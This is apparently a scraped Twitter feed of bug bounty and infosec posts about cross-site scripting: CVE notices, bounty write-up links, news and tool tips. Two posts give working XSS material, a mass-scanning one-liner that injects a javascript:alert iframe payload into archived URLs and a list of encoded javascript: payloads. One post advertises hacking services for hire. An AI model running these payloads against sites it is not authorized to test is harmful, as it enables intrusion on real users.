@h1Discloseda year ago⚡ HTML injection that may lead to XSS on https://t.co/uznUEc0rdi through H1 Triage Wizard Chrome Extension 👨💻 @jobertabma ➟ HackerOne 🟨 Low 💰 N/A https://t.co/AfC14S4bWp #bugbounty #bugbountytips #cybersecurity https://t.co/hbWqPcBunt
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Ato, Xss, Bugbountytips]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@imranparray101 @SaveToNotion #thread #xss #ato #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year agoecho test(.)com | waybackurls | grep "=" | grep -Ev "\.(svg|jpg|jpeg|png|gif|ico|bmp|webp|otf|eot|tif|tiff|ttf|woff|woff2|pdf|txt|js|css)" | gouro | qsreplace -a '"><iframe/src=javascript:alert(document.domain)>' | fff -k -M 'alert(document.domain)' #cybersecurity #xss #infosec
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year ago#cybersecurity #bugbountytip #xss #infosecurity #infosec https://t.co/lWazPg3Gv1
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year ago#infosecurity #infosec #bugbountytip #xss #cybersecurity https://t.co/uDlLxMX5Ci
![profile](https://pbs.twimg.com/profile_images/1564668587494612993/e5GRh31Y_normal.jpg)
shahmidoe
@shahmidoea year ago#cybersecurity #infosec #xss #bugbountytip https://t.co/ixP60k8Ptn
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Xss, Bugbountytips]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@mtrantalainen @nh___limon @Heli__9 @SaveToNotion #thread #xss #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1481952396997980160/gXAXPmQ4_normal.jpg)
System Weakness
@SystemWeaknessa year agoChatGPT Hacking Prompts, SQLi, XSS, Vuln Analysis, Nuclei Templates, and more https://t.co/S3tuVfP73R #systemweakness #hacking #security #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1217734356640256000/ABSVcm4l_normal.jpg)
N45HT
@N45HTOfficiala year agoXSS 101 #xss #infosec #bugbountytips https://t.co/EhBNBRkPAp https://t.co/5eCvvd3CE7
![profile](https://pbs.twimg.com/profile_images/1619988979331244033/0R-RTiaa_normal.jpg)
DoubleTake
@LeDoubleTakea year agoJust solved : Web - Client/XSS - Stockée 1 challenge on Root-Me :þ https://t.co/R9vEbMfVOn @rootme_org #hacking #challenge #WebClient
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoBest #firefox addons for testing -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #OSINT #pentest credits: @cry__pto
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxseca year agoHackers are exploiting XSS vulns in Apache web servers‼️☹️ The Lynis security scanner does not just tell users that something is wrong, but it also gives suggestions on how to secure it✅😀 Find out more in our newsletter 👇 https://t.co/cW3jNwrG8P #Linux #opensource #infosec
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoChatGPT Hacking Prompts, SQLi, XSS, Vuln Analysis, Nuclei Templates, and more https://t.co/sWLfK7fz2H #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1607516814069698562/t6lLZs90_normal.jpg)
The XSS Rat - 🇺🇦
@theXSSrata year agoLove is in the air, and so is the thrill of hacking! James Beers and The XSS Rat have teamed up to offer an incredible Bug Bounty Bundle, including a variety of current courses. Enhance your skills, get your bundle now at https://t.co/QefZhG3eZQ!
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/yzuvusgmhJ #bugcrowd #bugbountyhunter #bugbountytips #hackerone #bugbounty #bugbountytip #bounty https://t.co/S9bjCmpBLc
![profile](https://pbs.twimg.com/profile_images/1592053924294336512/wq9WYUfS_normal.jpg)
Imran Parray
@imranparray101a year agoAnother Story ! Title: Stored XSS Leads to full org Takeover. Bounty: $4500 Type: Stored XSS Explanation 👇 #bugbounty #bugbountytips #onebugaday #cybersecurity https://t.co/YYVTxAo4UN
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/iANQHZoq7V
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO | Cybersecurity
@hacklidoa year ago💠 XSSHunter setup for blind xss via 4ways By @Dheerajydv19 🔗 https://t.co/x6uErzi8Dz - - - # Tags - - - #cybersecurity #infosec #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1493536387324203008/2a-UfWLn_normal.jpg)
Rahul Patwari
@RahulPatwari117a year agoCVE-2023-23161 A reflected cross-site scripting (XSS) injection vulnerability was discovered in the Art Gallery Management System Project v1.0. https://t.co/qyyICxLJVJ #cybersecurity #infosec #cve
![profile](https://pbs.twimg.com/profile_images/948886900168908802/9PcRqNuM_normal.jpg)
SEC Consult
@sec_consulta year agoWhen you hear about "any interactions" on Valentine's Day, it can only mean one thing... https://t.co/TTlMUTwa9E #infosec #automation #sdm #xss https://t.co/rnzlG5bqxb
![profile](https://pbs.twimg.com/profile_images/492312605134815232/JAYjfRk-_normal.jpeg)
Hakin9
@Hakin9a year agoCross-Site Scripting (XSS) flaws and focus on Blind XSS by Roberto Chemama & Antoine Planque. https://t.co/3T7LR5UNKi #security #opensource #cybersecurity #malware #cyber #pentesting #malwareanalysis #infosec #redteam #malwarehunting #hacking #infosec #threathunting #bugbounty
![profile](https://pbs.twimg.com/profile_images/1606336255067058176/cbcV3_bD_normal.jpg)
0 day exploit
@0day_exploit_a year agoThread 🧵:👇 Found Open-redirect >> xss >> ato 1) Try normal XSS payload - javascript:alert(1) javascript:%61lert(1) javascript:&#37&#54&#49lert(1) javascript:%26%2337%26%2354%26%2349lert(1) #BugBounty #bugbountytips #infosec #403bypass
![profile](https://pbs.twimg.com/profile_images/1536918615320059905/H2nTRpbN_normal.jpg)
Rahmat Qurishi
@RahmatQurishia year agoI earned $300 for my submission on @bugcrowd Bug: reflected xss I use GAP extension by @xnl_h4ck3r to extract parameters And fuzz parameters with intruder on different endpoints #ItTakesACrowd #bugbounty #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1613784461208064000/-428GwOS_normal.jpg)
Dheeraj Yadav
@Dheerajydv19a year ago4Ways to Setup Xsshunter for finding blind xss vulnerabilities Just published a new blog on @hacklido as I feel a need of it, checkout it at https://t.co/eSWti7njpz #XSSHunter #BlindXSS #WebApplicationSecurity #BugBounty #bugbountytips #PenetrationTesting #Infosec #bughunting
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoResearch | Bypass CSRF Protection w/ XSS https://t.co/VRmi8uOEjY #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_falla year agoCVE-2023-25727: phpMyAdmin Releases Software Update to Fix XSS Vulnerability https://t.co/Jv59FsBMyc #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/1581171994980384772/q-EZkbXa_normal.jpg)
Shubham Tiwari
@shubhamtiwari_ra year agoI have reported many vulnerabilities to hackers #hackerone #BugBounty #bugbountytips #xss #vulnerabilities https://t.co/thceLLpf51
![profile](https://pbs.twimg.com/profile_images/1434211180965347329/zxgxkrpz_normal.jpg)
Rachit
@iamR3KTa year agoWhen you got nothing on a target program. Search for resolved reports of that program from - @hackerone hactivity - openbugbounty - Twitter search - Articles on Medium and try to bypass those vulnerabilities. Through this, I found XSS where I failed initially. #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/XQLdL69kcU #hackerone #bugbountyhunter #bugbounty #bugbountytips #bounty #rewards #hack #xss #yeswehack #bugcrowd @Hacker0x01 @Bugcrowd @intigriti @yeswehack https://t.co/Xdd5MeNMDi
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/ZW8Ns1zMle #BountyTips #bugbounty #bugbountytips #bugbountyhunter #hackerone #xss @Hacker0x01 https://t.co/44qdqqUZrI
![profile](https://pbs.twimg.com/profile_images/1624999751241564161/WBHECyq0_normal.jpg)
Daily Bounty Tips
@BountyTips_a year agohttps://t.co/XQLdL69kcU #BountyTips #bugbounty #bugbountytips #bugbountyhunter #hackerone #xss https://t.co/2g6MUXhRNc
![profile](https://pbs.twimg.com/profile_images/1598179360900780034/Gywep4k9_normal.jpg)
Het Mehta
@hetmehtaaa year agohttps://t.co/WIkVWVUeIV https://t.co/L1ie5KbZDT https://t.co/r68rlCYnzh https://t.co/C3Y5DEKtbF https://t.co/zh68ZxNoo8 https://t.co/KXKZUAsOip https://t.co/viZcjDOW4q https://t.co/CSgw2SdkCH #infosec #cyber #security #hacking
![profile](https://pbs.twimg.com/profile_images/1322009291490914304/LeOaiIzY_normal.jpg)
zzzZ
@WkendXua year ago@0x0SojalSec #bugbountytips #bypass #xss @memdotai mem it
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoXSS Via QR Code https://t.co/n7CjfTrDXe #bugbountytips #xssattack #penetrationtesting
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoa repository to keep track of cool XSS payloads ⚔️ https://t.co/5auB2b5SlB Check this out! #infosecurity #XssPayloads #cybersec #bugbountytips https://t.co/uzhe7YDCic
![profile](https://pbs.twimg.com/profile_images/1621590492457717764/UVWRZU5N_normal.jpg)
Ariel
@Ariel46326723a year agoExploit Collector: ChiKoi 1.0 Cross Site Scripting #BlackTechTwitter #xss #hacking #cybersecurity #sqlinjection #ps #bugbounty #pentesting #csrf #owasp https://t.co/Yg6yrN2qEY
![profile](https://pbs.twimg.com/profile_images/1578326271435501568/_f_iCA6__normal.jpg)
sudo_jeli
@sudo_jelia year agoYay, I was awarded a $750 bounty on @Hacker0x01! https://t.co/SOcQqjrmKG #TogetherWeHitHarder #hackerone #hacker0x01 #bugbounty #xss https://t.co/1beTEiUdqy
![profile](https://pbs.twimg.com/profile_images/1591824011876618243/DyehJOPS_normal.png)
Jordi Alba
@root_experta year agoXss Bypass trick! Just I found this in my archive, year 2021, this website was public program in bugcrowd, but this was self xss. Happy hunting! #xss #bypass #BugBounty https://t.co/DynZRXlojX
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBypassing Cloudflare WAF: XSS via SQL Injection https://t.co/Ic8eita6eo #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1615635745636589569/gbAt5NNP_normal.jpg)
🐞Sara Badran
@SaraBadran18a year agoReflected XSS and 3,000$ Bounty from Microsoft Forms💵🤷♀️ -- By @Supakiad_Mee -- https://t.co/XpSJ2sHSxy -- #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished #bugbountytip https://t.co/jiZNf7tQwl
![profile](https://pbs.twimg.com/profile_images/1342219937985794048/SzSzYGwD_normal.jpg)
Andreas Finstad - (4ndr34z)
@4nqr34za year agoProvide Server v.14.4 XSS -> CSRF -> RCE (CVE-2023-23286) https://t.co/ctELV8BWze This is why XSS never should be "out of scope" in bug bounty programs! #xss #bugbounty #CVE-2023-23286 #infosec
![profile](https://pbs.twimg.com/profile_images/1169067340828250113/02WuFDki_normal.jpg)
My Space!
@Supakiad_Meea year agoI hope it's not a duplicate🥲. #xss #microsoft #BugBounty #bugbountytips https://t.co/OMZNp7Jg2h
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoUnsanitized HTML input - Visit https://t.co/wwJmM1HWyb for the solution. #web_application #xss #injection #infosec #engineer
![profile](https://pbs.twimg.com/profile_images/1566871015178862593/g4u6GLh6_normal.jpg)
0xTaHa
@FX_T4h4a year agohi there, can anyone explain why we used "in" to solve this XSS challenge? https://t.co/85aweTmqRs thank uu!! #XSS #bugbountytips #infosec #ctf
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0747): Cross-site Scripting (XSS) - Stored in btcpayserver/btcpayserver. https://t.co/FvsSF3x4Sk Disclosed by https://t.co/PHAfdzcZFh, fixed by @BtcpayServer... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoVulnexp 90 | Day26 XSS Labs ➡️Free Labs: #bugbountytips #bugbountytip Thread 🧵 : 👇 https://t.co/sLHC5FLdJT
![profile](https://pbs.twimg.com/profile_images/1498092695218229255/dTZKhdy2_normal.jpg)
Hassan
@iamHasssana year agoSo, finally I have submitted my first vulnerability (DOM based XSS) after two weeks of testing ☺ #Pentesting #infosec #CyberSec
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoMIME types that allow XSS in modern browsers - Visit https://t.co/QPZZILapxJ for the solution. #web_browser #xss #javascript #mime_type #infosec
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0743): Cross-site Scripting (XSS) - Generic in answerdev/answer. https://t.co/DQvXee8ND5 Disclosed by https://t.co/3xOZvDI1Hp, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0742): Cross-site Scripting (XSS) - Stored in answerdev/answer. https://t.co/YGcQt9KPiA Disclosed by https://t.co/0vBD5at5Kv, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0741): Cross-site Scripting (XSS) - DOM in answerdev/answer. https://t.co/Q95YwhvWCC Disclosed by https://t.co/0vBD5at5Kv, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0740): Cross-site Scripting (XSS) - Stored in answerdev/answer. https://t.co/ut8D7TYbao Disclosed by https://t.co/3xOZvDI1Hp, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoHow I found XSS on Admin Page without login! https://t.co/e153dJ72nm #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms https://t.co/zncbtgMmRa #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1178705751025602560/GXqhNwXo_normal.jpg)
Sean Melia
@seanmealsa year agoSpinning up your own private xss hunter server is incredibly easy and a good practice. Anyone that bug hunts regularly really should have one by now. Plus, it gives you a little insight into how the backend of the web apps that you’re hacking work.
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0736): Cross-site Scripting (XSS) - Stored in wallabag/wallabag. https://t.co/zE46hSbSOi Disclosed by https://t.co/WHnHdmsAhC, fixed by @j0k... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoXSS vulnerability #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoStored XSS + PHP Backdoor + File upload vulnerability - Visit https://t.co/7pPz1VQRXW for the solution. #php #xss #metasploit #infosec #coder
![profile](https://pbs.twimg.com/profile_images/1621521038562705414/87MH4YdX_normal.jpg)
cybercanine
@cyberK9xa year ago🚨 Alert Hunters !! 🚨 Worried about #XSSHunter privacy? I've got you covered. Writing an in-depth article on hosting your own XSS Hunter instance. Keep an eye, dropping soon! 👀 #bugbounty #bugbountytips #cybersecurity #Infosec #WebSecurity
![profile](https://pbs.twimg.com/profile_images/1610335458290028546/JGaczfQr_normal.jpg)
cacheme
@justcachemea year agoI have found an Open Redirect via Host Header on a website that does not have user registration (tried sqli & xss but no luck) but I feel there's something here. Is there anyone who's willing to collaborate? #bugbountytip #bugbounty
![profile](https://pbs.twimg.com/profile_images/1359502098333720576/Wk7LCkvt_normal.jpg)
Intect
@Intect6a year agoLet's have look at the top 5 OWASP vulnerabilities of 2022 :- -> SECURITY MISCONFIGURATION -> SQL INJECTION -> INSECURE DESIGN -> XSS -> SSRF #vulnerabilities #Intect #Friday #Cybersecurity #OWASP #cyberattack #hacker #hacking #xss #ssrf #sqlinjection #cybersecuritythreats https://t.co/mqIM2pzETu
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoRadio silence from DMS vendor quartet over XSS zero-days https://t.co/lJwrMPrSJk #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoCheat-Sheets: https://t.co/RcXJbb1Vce https://t.co/G5QgJwYDKX https://t.co/aJp6crFinw
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoVulnexp 90 | Day25 XSS Cheat-Sheets ➡️Cheat-Sheets: ➡️Payloads: #bugbountytips #bugbountytip Thread 🧵 : 👇
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoRadio silence from DMS vendor quartet over XSS zero-days #cybersecurity #infosec https://t.co/MmsUw4MtbD
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🍕 Radio silence from DMS vendor quartet over XSS zero-days LINK: https://t.co/2S3pgdjPFD Source: The Daily Swig #infosec #networksecurity #redteam Interested in OffSec? 💪 @HackersFeed_io
![profile](https://pbs.twimg.com/profile_images/1490936144468770818/PfZYjq9E_normal.png)
Enciphers
@EnciphersLabsa year agoHere is a story of how a self XSS was turned into Stored XSS. https://t.co/je9lh8bRQ7 #webappsecurity #xss #PenetrationTesting #websecurity #cybersecurity #informationsecurity #blog #threats #vulnerability #enciphers #hacking #dataprotection #cybercrime #training #appsec https://t.co/y97OTmHtXA
![profile](https://pbs.twimg.com/profile_images/1475466784387915779/G7yqV0mH_normal.jpg)
Securzy
@SecurzyHQa year agoYesterday was a huge success! Thank you Rohit Gautam for an insightful webinar on #XSS Techniques & Automation for Bug Bounties. Participants learned valuable skills to improve their bug bounty game. Register at https://t.co/jCzDfyAUy6 for more such webinars! #BugBounty #Securzy https://t.co/EJ8Z6X5Wxi
![profile](https://pbs.twimg.com/profile_images/1621477987005628416/mtPhuxEo_normal.jpg)
HB HACKS
@Hb_Hacksa year agoHack Services available 24/7 Link: https://t.co/4aQu4aGQiA… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1620308287370706946/nr8342ln_normal.jpg)
Parvez Mosaraf
@mosaraf_babua year ago#BugBounty #Burpsuite #DAST #Pentesting #Plugins #offsec #seguridadinformtica #ethicalhacking #cwe #cve #owasp #ciberdefensa #cibercrimen #ciso #ciberseguridad #ciberataque #ciberdelincuentes #exploit #pentester #offsec #redteam #ctf #hacking #xss #sqli #LIE https://t.co/KVuYwBFc0p
![profile](https://pbs.twimg.com/profile_images/1608668518786166785/9pIxNLvB_normal.jpg)
Dharamveer prasad ( v_3_3_r )
@Dharamveer_____a year ago🔥XSS hunters, don't overlook the power of URL context! Many vulnerabilities can be found by testing payloads in URL parameters, so make sure to check this area thoroughly: #infosec #AppSec payload list: 👇
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🥪 New XSS Hunter host Truffle Security faces privacy backlash 👉 https://t.co/Hyacv87ZCH Source: The Daily Swig #hacking #cybersecurity #infosec #hack What do you think about it?
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoNew XSS Hunter host Truffle Security faces privacy backlash #cybersecurity #infosec https://t.co/VgOGrBhh1j
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoMultiple Document Management XSS Flaw Let Attackers Access Sensitive #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1540626470896541696/C-hRuRks_normal.jpg)
Br0k3n_1337
@Br0k3n_1337a year agoAlhamdulillah❤️ I earned $350 for my submission on @bugcrowd Tips: Immediately Retest your report after it gets resolved. #ItTakesACrowd #bugbountytip #bugbountytips #bugbounty #xss https://t.co/T4WjG7qABU
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0a year ago#NahamCon2022EU: I Hope This Sticks: Analyzing ClipboardEvent Listeners for XSS by spaceraccoon #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/2EY9VmWUTm
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0a year agoVue JS Reflected XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/ut2WCgwTnC
![profile](https://pbs.twimg.com/profile_images/1619695358476689409/rfMHBiR7_normal.jpg)
rohit_Kumar
@krrohit210302a year agoXss but duplicate 😞 #bugbounty https://t.co/URaTTalDjJ
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoWriteups List : • https://t.co/fy7X2Qpz16 • https://t.co/p1U60RMrlu
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoVulnexp 90 | Day24 XSS Write-ups ➡️Writeups List : #bugbountytips #bugbountytip Thread 🧵 : 👇 https://t.co/oS0UuUPcgX
![profile](https://pbs.twimg.com/profile_images/1583917642918039552/5NAyEOrW_normal.jpg)
Hardik Singh
@Kxddaha year agoI'm trying to bypass XSS filter on an application: 1. It strips away any instance of < > + 2. Input limited to 40 chars 3. It doesn't save if input has ' [ ] \ Input appears mostly in either <td>input</td> and <option>input</option> #infosec #bugbounty
![profile](https://pbs.twimg.com/profile_images/1551189938779181058/v8GHcpBz_normal.jpg)
Coy Emerald 🇳🇬🇺🇦
@CoyEmerald1a year agoThere's a security vulnerability (bug) in this picture, can you spot it? (a) Sql Injection (b) Xss (c) (fill in this space with your answer) 😅 #security #vulnerabilitydisclosure #bugbountytips @CoyEmerald1 @HackenProof @Hacker0x01 @intigriti https://t.co/TJQezMh1GK
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Securitya year agoPopular keywords used with #vulnerability tweets Date: 2023-02-08 Unique Tweets: 321 TOP 10 KEYWORDS 1: Data 2: Cross 3: ESXiArgs 4: Site 5: Access 6: Vigil 7: US 8: CISA 9: XSS 10: Toyota bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1606561106524344320/Pk0lT02d_normal.jpg)
مهند 🐎 | Mohnad
@Mohnada year agoWhen pentester play Fivem then try to find some juicy Stored xss :) #bugbountytips #bugbountytip https://t.co/bMCfnHseB5
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year ago@bxsshunter is going open-source to ensure transparency & launching custom database integration for complete control of your data. Perfect for users who can't run custom instances. Get ready for this exciting update! (https://t.co/gjwNwSUa2N) #Cybersecurity #bugbountytips #xss https://t.co/CWNV91ubrr
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoJoin https://t.co/gjwNwSUa2N now to stay informed when we release our open-source software and receive a comprehensive guide on how to gain full control over your data through personalized database integration. This feature will be included in an upcoming update. #bugbountytips https://t.co/JUib9Yf7wp
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoThe #AWSVRP on #HackerOne now requires personal XSSHunter instances for reporting. We're providing open-source #BXSSHunter for the community & ability to integrate custom databases for full control over your data. Report vuln with peace of mind. #bugbountytips #cybersecurity https://t.co/pEjJmeNIUW
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoCritical XSS flaw in phpMyAdmin allows malicious database operations #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoExciting news! Following industry trends and valuable insights from @zseano, we've decided to open-source our @bxsshunter. This update will empower users to monitor their data by integrating their custom database. Stay tuned for more details on the release! #bugbountytips https://t.co/sxGMqpOKaa
![profile](https://pbs.twimg.com/profile_images/1068578743642349568/4Cqw0DvY_normal.jpg)
IICyberSecurity
@iicsorga year ago#infosec #cybersecurity Critical XSS flaw in phpMyAdmin allows malicious database operations https://t.co/sL6qLGvZQT https://t.co/Cp8kA6W4vI
![profile](https://pbs.twimg.com/profile_images/1557826721801437184/FVP5u7tF_normal.jpg)
abdulsec
@moodiAbdoula year ago@Masonhck3571 Smart way to automate blind xss discovery in all bugbounty Target but i prefer the self hosted https://t.co/FihoM3mhTv
![profile](https://pbs.twimg.com/profile_images/1615391817985294350/8siu4Qvd_normal.jpg)
bullsec
@bullsecsecurea year ago@cyberK9x On an educational note. Part of the skillset for a successful infosec person should be standing up basic infrastructure stuff (like XSS Hunter or Burp Collaborator), learn a lot about configuration and management and doing it on a VPS isolates you from an actual f**k up.
![profile](https://pbs.twimg.com/profile_images/1621521038562705414/87MH4YdX_normal.jpg)
cybercanine
@cyberK9xa year ago🚨 ALERT !! 🚨 Stop relying on third-party hosted XSS hunter instances! You never know what's being monitored and it's best to have full control over your testing environment. Invest in a $5 VPS and host your own instance for transparency & security. #bugbountytips #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1219143153871020032/3tvm-Zt7_normal.jpg)
Sathish M
@goldenrockers1a year ago@impratikdabhi @therceman @SaveToBookmarks #BugBounty #XSS
![profile](https://pbs.twimg.com/profile_images/1375217924017819649/7z5Z5mCF_normal.jpg)
Barbarosa
@Barbarossa0xa year agoThe vulnerability can be: - XSS - CSRF - DIRTY COOKIE - NEGOTIATE DOMAIN - NEGOTIATE HOST - NEGOTIATE PORT - NEGOTIATE PATH - NEGOTIATE PROTOCOL - NEGOTIATE PROTOCOL VERSION #infosec #CyberSec #Hacking #tryhackme
